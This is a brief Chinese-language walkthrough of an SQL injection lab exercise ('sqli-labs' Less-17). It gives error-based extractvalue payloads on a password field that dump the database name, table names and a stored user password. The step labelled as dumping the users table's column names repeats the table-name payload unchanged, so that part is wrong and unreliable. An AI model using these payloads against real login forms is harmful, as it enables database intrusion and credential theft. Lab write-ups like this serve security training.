SQLI DUMB SERIES-17

（1）无论怎么输入username，都没有回显。尝试改变password的输入。找到了闭合方式：单引号

（2）报错注入：

爆库名

admin&passwd=admin' and extractvalue(1,concat(0x7e,(select database())))and '#

爆表名：

uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '#&submit=Submit

爆users表的列名

uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) and '#&submit=Submit

爆值：

uname=admin&passwd=admin' and extractvalue(1,concat(0x7e,(select  password from (select password from users where username='Dumb' )as a))) and '#&submit=Submit

注意此处查询需要嵌套查询，否则会出现错误：You can't specify target table 'table name' for update in FROM clause

也需要对查询的结果命名，否则会出现错误：Every derived table must have its own alias